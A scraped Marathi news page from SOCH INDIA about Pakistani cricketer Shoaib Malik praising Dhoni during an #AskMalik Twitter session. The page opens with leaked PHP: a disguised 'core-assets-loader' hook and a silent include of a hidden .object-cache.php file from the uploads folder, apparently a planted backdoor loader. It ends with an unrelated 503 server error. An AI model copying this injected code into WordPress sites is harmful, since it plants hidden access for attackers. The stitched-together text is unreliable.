add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); धोनीमुळे पाकिस्तानी क्रिकेटर शोएबचे ट्विटर बहरले! – SOCH INDIA
Menu

खेल
धोनीमुळे पाकिस्तानी क्रिकेटर शोएबचे ट्विटर बहरले!

nobanner

भारतीय संघाचा माजी कर्णधार आणि सध्या यष्टीमागे चपळता दाखवणाऱ्या धोनीचे अनेक चाहते आहेत. पण या चाहत्यांमध्ये आता पाकिस्तानी क्रिकेटर शोएब मलिकचाही समावेश झालाय. पाकिस्तान टीमचा अनुभवी फलंदाज शोएब मलिक भारतीय धोनीचा जबरा फॅन असल्याचे नुकतेच दिसून आले. वर्ल्ड इलेवनविरुद्ध सुरु असलेल्या आंतरराष्ट्रीय टी-२० स्पर्धेतील निर्णायक सामन्यापूर्वी शोएबने ट्विटरच्या माध्यमातून आपल्या चाहत्यांशी संवाद साधला. गुरुवारी त्याने ‘आस्कमलिक’ या हॅशटॅगच्या माध्यमातून चाहत्यांशी मनमोकळ्या गप्पा मारल्या. यावेळी एका चाहत्याने त्याला धोनीविषयी काही तरी सांग, अशी विनंती केली. चाहत्याच्या या विनंतीला शोएबने क्षणाचाही विलंब न करता रिप्लाय दिला. ‘लिजंड गॉट’ या अवघ्या दोन शब्दांत धोनी क्रिकेट जगतातील सर्वश्रेष्ठ खेळाडू आहे, असे त्याने म्हटले.

धोनी विषयी मनातील भावना व्यक्त केल्यानंतर तो धोनीचा जबरा फॅन असल्याचे सिद्ध तर झालेच. पण त्याच्या ‘आस्कमलिक’ हा हॅशटगही चांगलाच लोकप्रिय झाला. शोएबच्या रिप्लायवर अनेक प्रतिक्रिया उमटत असून धोनीला सन्मान दिल्यानंतर सोशल मीडियावर सध्या ‘आस्कमलिक’ हॅशटॅगची चर्चा जोर धरताना दिसत आहे. शोएब सध्या पाकिस्तान आणि विश्व इलेव्हन यांच्यात तीन दिवसांच्या टी-२० मालिकेत व्यस्त आहे. या मालिकेत क्रिकेट जगतातील अनेक खेळाडू सहभागी झाले आहेत. मात्र एकाही भारतीय खेळाडूने पाकिस्तानमध्ये रंगलेल्या या स्पर्धेत भाग घेतलेला नाही. या मालिकेत आतापर्यंत झालेल्या दोन सामन्यात दोन्ही संघांनी प्रत्येकी एक-एक सामना जिंकून मालिकेत बरोबरी साधली आहे. शुक्रवारी होणारा सामना जिंकून मालिका खिशात घालण्याच्या इराद्याने दोन्ही संघ मैदानात उतरतील. पाकिस्तानचे प्रतिनिधीत्व करताना शोएब मलिकने टी-२० सर्वाधिक धावा केल्या आहेत. त्याच्या नावे १ हजार ७०० हून अधिक धावा आहेत.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.